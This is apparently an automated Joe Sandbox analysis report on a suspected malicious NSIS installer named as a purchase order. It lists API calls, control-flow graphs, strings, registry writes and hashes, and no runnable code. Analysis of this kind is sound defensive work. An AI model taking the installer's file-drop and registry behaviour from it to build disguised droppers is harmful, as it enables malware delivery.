• Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: FileFindFirst
                                                                  • String ID:
                                                                  • API String ID: 1974802433-0
                                                                  • Opcode ID: 760ba12aea5bac669ea06a92ce868f6cfbbc58d79179603cd607c726fd559e33
                                                                  • Instruction ID: ca82d2f7608ddbe9a9db451b4e667c54ef54e9945bbc135f2cbc761c4928cd6d
                                                                  • Opcode Fuzzy Hash: 760ba12aea5bac669ea06a92ce868f6cfbbc58d79179603cd607c726fd559e33
                                                                  • Instruction Fuzzy Hash: 3CF08275600114DBC711EBE4DD49AAEB374FF00324F2045BBE105F31E1D7B499559B2A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

Control-flow Graph (legend of the rendered graph: Executed / Not Executed)
control_flow_graph 182 403d6a-403d7c 183 403d82-403d88 182->183 184 403ebd-403ecc 182->184 183->184 185 403d8e-403d97 183->185 186 403f1b-403f30 184->186 187 403ece-403f16 GetDlgItem * 2 call 404242 SetClassLongW call 40140b 184->187 188 403d99-403da6 SetWindowPos 185->188 189 403dac-403daf 185->189 191 403f70-403f75 call 40428e 186->191 192 403f32-403f35 186->192 187->186 188->189 194 403db1-403dc3 ShowWindow 189->194 195 403dc9-403dcf 189->195 200 403f7a-403f95 191->200 197 403f37-403f42 call 401389 192->197 198 403f68-403f6a 192->198 194->195 201 403dd1-403de6 DestroyWindow 195->201 202 403deb-403dee 195->202 197->198 219 403f44-403f63 SendMessageW 197->219 198->191 199 40420f 198->199 207 404211-404218 199->207 205 403f97-403f99 call 40140b 200->205 206 403f9e-403fa4 200->206 208 4041ec-4041f2 201->208 210 403df0-403dfc SetWindowLongW 202->210 211 403e01-403e07 202->211 205->206 215 403faa-403fb5 206->215 216 4041cd-4041e6 DestroyWindow EndDialog 206->216 208->199 213 4041f4-4041fa 208->213 210->207 217 403eaa-403eb8 call 4042a9 211->217 218 403e0d-403e1e GetDlgItem 211->218 213->199 221 4041fc-404205 ShowWindow 213->221 215->216 222 403fbb-404008 call 4061a0 call 404242 * 3 GetDlgItem 215->222 216->208 217->207 223 403e20-403e37 SendMessageW IsWindowEnabled 218->223 224 403e3d-403e40 218->224 219->207 221->199 252 404012-40404e ShowWindow KiUserCallbackDispatcher call 404264 EnableWindow 222->252 253 40400a-40400f 222->253 223->199 223->224 227 403e42-403e43 224->227 228 403e45-403e48 224->228 232 403e73-403e78 call 40421b 227->232 229 403e56-403e5b 228->229 230 403e4a-403e50 228->230 233 403e91-403ea4 SendMessageW 229->233 235 403e5d-403e63 229->235 230->233 234 403e52-403e54 230->234 232->217 233->217 234->232 238 403e65-403e6b call 40140b 235->238 239 403e7a-403e83 call 40140b 235->239 248 403e71 238->248 239->217 249 403e85-403e8f 239->249 248->232 249->248 256 404050-404051 252->256 257 404053 252->257 253->252 258 404055-404083 GetSystemMenu EnableMenuItem SendMessageW 256->258 257->258 259 404085-404096 SendMessageW 258->259 260 404098 258->260 261 40409e-4040dc call 404277 call 40617e lstrlenW call 4061a0 SetWindowTextW call 401389 259->261 260->261 261->200 270 4040e2-4040e4 261->270 270->200 271 4040ea-4040ee 270->271 272 4040f0-4040f6 271->272 273 40410d-404121 DestroyWindow 271->273 272->199 274 4040fc-404102 272->274 273->208 275 404127-404154 CreateDialogParamW 273->275 274->200 276 404108 274->276 275->208 277 40415a-4041b1 call 404242 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 275->277 276->199 277->199 282 4041b3-4041c6 ShowWindow call 40428e 277->282 284 4041cb 282->284 284->208
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DA6
                                                                  • ShowWindow.USER32(?), ref: 00403DC3
                                                                  • DestroyWindow.USER32 ref: 00403DD7
                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DF3
                                                                  • GetDlgItem.USER32(?,?), ref: 00403E14
                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E28
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403E2F
                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403EDD
                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403EE7
                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403F01
                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F52
                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403FF8
                                                                  • ShowWindow.USER32(00000000,?), ref: 00404019
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040402B
                                                                  • EnableWindow.USER32(?,?), ref: 00404046
                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040405C
                                                                  • EnableMenuItem.USER32(00000000), ref: 00404063
                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040407B
                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040408E
                                                                  • lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 004040B7
                                                                  • SetWindowTextW.USER32(?,00423728), ref: 004040CB
                                                                  • ShowWindow.USER32(?,0000000A), ref: 004041FF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                  • String ID: (7B
                                                                  • API String ID: 3282139019-3251261122
                                                                  • Opcode ID: dd9405652fbbb87ab488d8a14d0aeb81f33be68f6094b2cdc8f2b1d388c01c08
                                                                  • Instruction ID: 4530f9416eb169af0d44378ddba5762a1eee688012323a74912104aead4a3b33
                                                                  • Opcode Fuzzy Hash: dd9405652fbbb87ab488d8a14d0aeb81f33be68f6094b2cdc8f2b1d388c01c08
                                                                  • Instruction Fuzzy Hash: A5C1FFB1640200FFCB206F61EE84E2B3AA8EB95745F40057EF641B21F1CB7999529B6D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

Control-flow Graph (legend of the rendered graph: Executed / Not Executed)
                                                                  control_flow_graph 285 4039c7-4039df call 406558 288 4039e1-4039f1 call 4060c5 285->288 289 4039f3-403a2a call 40604b 285->289 297 403a4d-403a76 call 403c9d call 405c3a 288->297 293 403a42-403a48 lstrcatW 289->293 294 403a2c-403a3d call 40604b 289->294 293->297 294->293 303 403b08-403b10 call 405c3a 297->303 304 403a7c-403a81 297->304 310 403b12-403b19 call 4061a0 303->310 311 403b1e-403b43 LoadImageW 303->311 304->303 305 403a87-403aaf call 40604b 304->305 305->303 314 403ab1-403ab5 305->314 310->311 312 403bc4-403bcc call 40140b 311->312 313 403b45-403b75 RegisterClassW 311->313 328 403bd6-403be1 call 403c9d 312->328 329 403bce-403bd1 312->329 316 403c93 313->316 317 403b7b-403bbf SystemParametersInfoW CreateWindowExW 313->317 319 403ac7-403ad3 lstrlenW 314->319 320 403ab7-403ac4 call 405b5f 314->320 321 403c95-403c9c 316->321 317->312 322 403ad5-403ae3 lstrcmpiW 319->322 323 403afb-403b03 call 405b32 call 40617e 319->323 320->319 322->323 327 403ae5-403aef GetFileAttributesW 322->327 323->303 331 403af1-403af3 327->331 332 403af5-403af6 call 405b7e 327->332 338 403be7-403c01 ShowWindow call 4064e8 328->338 339 403c6a-403c6b call 4053b0 328->339 329->321 331->323 331->332 332->323 346 403c03-403c08 call 4064e8 338->346 347 403c0d-403c1f GetClassInfoW 338->347 342 403c70-403c72 339->342 344 403c74-403c7a 342->344 345 403c8c-403c8e call 40140b 342->345 344->329 350 403c80-403c87 call 40140b 344->350 345->316 346->347 348 403c21-403c31 GetClassInfoW RegisterClassW 347->348 349 403c37-403c5a DialogBoxParamW call 40140b 347->349 348->349 355 403c5f-403c68 call 403917 349->355 350->329 355->321
                                                                  APIs
                                                                    • Part of subcall function 00406558: GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
                                                                    • Part of subcall function 00406558: GetProcAddress.KERNEL32(00000000,?), ref: 00406585
                                                                  • lstrcatW.KERNEL32(1033,00423728), ref: 00403A48
                                                                  • lstrlenW.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,75573420), ref: 00403AC8
                                                                  • lstrcmpiW.KERNEL32(?,.exe,Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403ADB
                                                                  • GetFileAttributesW.KERNEL32(Remove folder: ), ref: 00403AE6
                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement), ref: 00403B2F
                                                                    • Part of subcall function 004060C5: wsprintfW.USER32 ref: 004060D2
                                                                  • RegisterClassW.USER32(004291E0), ref: 00403B6C
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B84
                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BB9
                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403BEF
                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403C1B
                                                                  • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403C28
                                                                  • RegisterClassW.USER32(004291E0), ref: 00403C31
                                                                  • DialogBoxParamW.USER32(?,00000000,00403D6A,00000000), ref: 00403C50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: "C:\Users\user\Desktop\PO_00290292.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                  • API String ID: 1975747703-3822136923
                                                                  • Opcode ID: d6eb97ecc45ceecdb0e2d203f76fda1198e4e833a1627c35b81ac0c75580ce77
                                                                  • Instruction ID: e7f44595d902892b35b801f2f0c3734befc0b18a393fec54347386a87508d522
                                                                  • Opcode Fuzzy Hash: d6eb97ecc45ceecdb0e2d203f76fda1198e4e833a1627c35b81ac0c75580ce77
                                                                  • Instruction Fuzzy Hash: 8661C570244200BAD730AF669D49E2B3A7CEB84B49F40453FF981B62E2DB7D5912C63D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph: entry block 402e41 (graph not reproduced)
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00402E55
                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO_00290292.exe,00000400), ref: 00402E71
                                                                    • Part of subcall function 00405D53: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\PO_00290292.exe,80000000,00000003), ref: 00405D57
                                                                    • Part of subcall function 00405D53: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79
                                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO_00290292.exe,C:\Users\user\Desktop\PO_00290292.exe,80000000,00000003), ref: 00402EBA
                                                                  • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403001
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                  • String ID: "C:\Users\user\Desktop\PO_00290292.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO_00290292.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$x~
                                                                  • API String ID: 2803837635-2767144313
                                                                  • Opcode ID: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                                  • Instruction ID: e866f1dd798e5fb15c0a347603bcfded6ce2f229c2e481af73dd86df93422dd6
                                                                  • Opcode Fuzzy Hash: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                                  • Instruction Fuzzy Hash: 9761C431A00215ABDB209F75DD49B9E7BB8EB00359F20817FF500F62D1DABD9A448B5D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph: entry block 401767 (graph not reproduced)
                                                                  APIs
                                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                                  • CompareFileTime.KERNEL32(-00000014,?,%derivering%\gadedrenges,%derivering%\gadedrenges,00000000,00000000,%derivering%\gadedrenges,C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement,?,?,00000031), ref: 004017CD
                                                                    • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
                                                                    • Part of subcall function 004052DD: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                    • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                    • Part of subcall function 004052DD: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00402E19), ref: 00405338
                                                                    • Part of subcall function 004052DD: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\), ref: 0040534A
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                  • String ID: %derivering%\gadedrenges$C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini$practical
                                                                  • API String ID: 1941528284-3816768022
                                                                  • Opcode ID: adcefff22d6d35a46cade79b64999059c3ac28fc575844980da9404600bf010c
                                                                  • Instruction ID: b64174440326d41e90dd14f1ad6608c73badddfa8ee8632f400ec40acf256ac3
                                                                  • Opcode Fuzzy Hash: adcefff22d6d35a46cade79b64999059c3ac28fc575844980da9404600bf010c
                                                                  • Instruction Fuzzy Hash: 0C41C431900515BACF117FB5CC46DAE3679EF05329B20827BF422F51E2DA3C86629A6D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph: entry block 4052dd (graph not reproduced)
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                  • lstrlenW.KERNEL32(00402E19,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                  • lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00402E19), ref: 00405338
                                                                  • SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\), ref: 0040534A
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                  • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\
                                                                  • API String ID: 2531174081-2912221903
                                                                  • Opcode ID: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                                  • Instruction ID: d14990956ab1253184f877e9e8298894284f42a30aea32824f5004b5108fa95f
                                                                  • Opcode Fuzzy Hash: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                                  • Instruction Fuzzy Hash: 62217F71900518BACF119FA6DD44ACFBFB8EF85354F10807AF904B62A1C7B94A51DFA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph: entry block 4057ac (graph not reproduced)
                                                                  APIs
                                                                  • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004057EF
                                                                  • GetLastError.KERNEL32 ref: 00405803
                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405818
                                                                  • GetLastError.KERNEL32 ref: 00405822
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004057D2
                                                                  • C:\Users\user\Desktop, xrefs: 004057AC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                  • API String ID: 3449924974-1326413622
                                                                  • Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                                  • Instruction ID: b278f7ea68de5888e34302da86fdb06c438f4ef9b03e74a9ab654546e4f81ce2
                                                                  • Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                                  • Instruction Fuzzy Hash: 89010871D00619DADF10DBA0D9447EFBFB8EB04304F00803ADA44B6190E7789618DFA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph: entry block 4064e8 (graph not reproduced)
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004064FF
                                                                  • wsprintfW.USER32 ref: 0040653A
                                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040654E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                  • API String ID: 2200240437-1946221925
                                                                  • Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                                  • Instruction ID: c6b4a3c42f63eea3762d57d51081eb848d485012b63e63803453d9912f42ff06
                                                                  • Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                                  • Instruction Fuzzy Hash: 3AF0FC70500219BADB10AB64ED0DF9B366CAB00304F10403AA646F10D0EB7CD725CBA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                   Control-flow Graph (basic blocks with the calls they contain and their successor blocks; the executed/not-executed colouring of the rendered graph is not recoverable from the text)

                                                                   • 649 [40237b-4023c1]: call 402cb4, call 402bbf (2x), RegCreateKeyExW -> 656, 657
                                                                   • 656 [4023c7-4023cf] -> 659, 660
                                                                   • 657 [402a4c-402a5b]: exit
                                                                   • 659 [4023d1-4023de]: call 402bbf, lstrlenW -> 660
                                                                   • 660 [4023e2-4023e5] -> 662, 663
                                                                   • 662 [4023f5-4023f8] -> 667, 668
                                                                   • 663 [4023e7-4023f4]: call 402ba2 -> 662
                                                                   • 667 [402409-40241d]: RegSetValueExW -> 671, 672
                                                                   • 668 [4023fa-402404]: call 4030e7 -> 667
                                                                   • 671 [402422-4024fc]: RegCloseKey -> 657
                                                                   • 672 [40241f] -> 671
                                                                  APIs
                                                                  • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateValuelstrlen
                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini
                                                                  • API String ID: 1356686001-1176133737
                                                                  • Opcode ID: 67c77c8d659d9d4bc82cacddac1e216fe0077c84403bdf1d9c96e54a2d3d16bf
                                                                  • Instruction ID: d84b147cfae213de6894e87518a1957a70c03431d85ade02b305fde94438308f
                                                                  • Opcode Fuzzy Hash: 67c77c8d659d9d4bc82cacddac1e216fe0077c84403bdf1d9c96e54a2d3d16bf
                                                                  • Instruction Fuzzy Hash: E511C071E00108BFEB10AFA4DE89DAE777DEB14358F11403AF904B71D1DBB85E409668
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                   Control-flow Graph (basic blocks and successor edges)

                                                                   • 674 [405d82-405d8e] -> 675
                                                                   • 675 [405d8f-405dc3]: GetTickCount, GetTempFileNameW -> 676, 677
                                                                   • 676 [405dd2-405dd4] -> 679
                                                                   • 677 [405dc5-405dc7] -> 675 (retry), 678
                                                                   • 678 [405dc9] -> 679
                                                                   • 679 [405dcc-405dcf]: exit
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00405DA0
                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\PO_00290292.exe",004033B4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405DBB
                                                                  Strings
                                                                  • "C:\Users\user\Desktop\PO_00290292.exe", xrefs: 00405D82
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D87
                                                                  • nsa, xrefs: 00405D8F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
